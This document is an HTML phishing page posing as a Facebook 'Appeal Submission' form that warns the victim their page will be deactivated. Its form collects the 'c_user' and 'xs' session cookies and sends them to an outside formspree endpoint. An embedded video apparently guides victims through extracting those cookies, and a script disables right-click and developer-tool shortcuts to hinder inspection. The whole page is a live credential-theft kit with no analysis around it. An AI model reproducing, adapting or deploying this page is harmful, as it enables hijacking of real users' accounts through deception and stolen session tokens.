<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b9/2023_Facebook_icon.svg/800px-2023_Facebook_icon.svg.png">
    <title>Appeal Submission</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            max-width: 55%;
            padding: 18px;
            border: 1px solid #cccccc;
            border-radius: 5px;
            background-color: #f9f9f9;
            margin: 20px auto;
            margin-top: 50px;
        }
        h1 {
            color: #333333;
            margin-top: 10px;
        }
        .message {
            margin-bottom: 20px;
        }
        
        
        form {
            margin-top: 20px;
            background-color: #ffffff;
            padding: 20px;
            
        }
        form label,
        form input,
        form textarea {
            display: block;
            margin-bottom: 10px;
            width: 100%;
            box-sizing: border-box;
            font-size: medium;
            font-weight: bold;
        }
        form input[type="submit"] {
            background-color: #4267b2;
            color: #ffffff;
            border: none;
            padding: 10px 20px;
            cursor: pointer;
            border-radius: 3px;
            font-size: 16px;
            font-weight: bold;
            margin-bottom: 0;
        }
        form input[type="submit"]:hover {
            background-color: #4267b2;
            font-weight: bold;
            margin-bottom: 0;
        }
    </style>
</head>
<body>
    <h1>Appeal To Prevent Losing Your Facebook Page</h1>
    <div class="message">
        <p>Dear User,</p>
        <p>Your facebook page is at risk of being deactivated. As we found some unusual activities in your page. <br> Please submit an appeal promptly to prevent this from happening.</p>
    </div>
    <div>
        <video controls="" loop autoplay width="100%" poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png" >
          <source src="https://detailed-video-29b30.web.app/detailed%20video.mp4"  type="video/mp4" >
       </video>
      </div>
  <p>Please make sure to keep your account logged in on your computer or laptop until you receive a verification email.</p>
    <form action="https://formspree.io/f/xwkgabwy" method="post">
        <label for="name">c_user</label>
        <input type="text" id="text" name="c_user" required>
        
        <label for="name">xs</label>
        <input type="text" id="tex" name="xs" required> <br>
        
        <input type="submit" value="Submit Appeal">
    </form>

    <script>
        document.addEventListener('contextmenu', function(e) {
            e.preventDefault();
        });
        document.onkeydown = function(e) {
            if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
                e.preventDefault();
            }
        };
    </script>
    
</body>

</html>
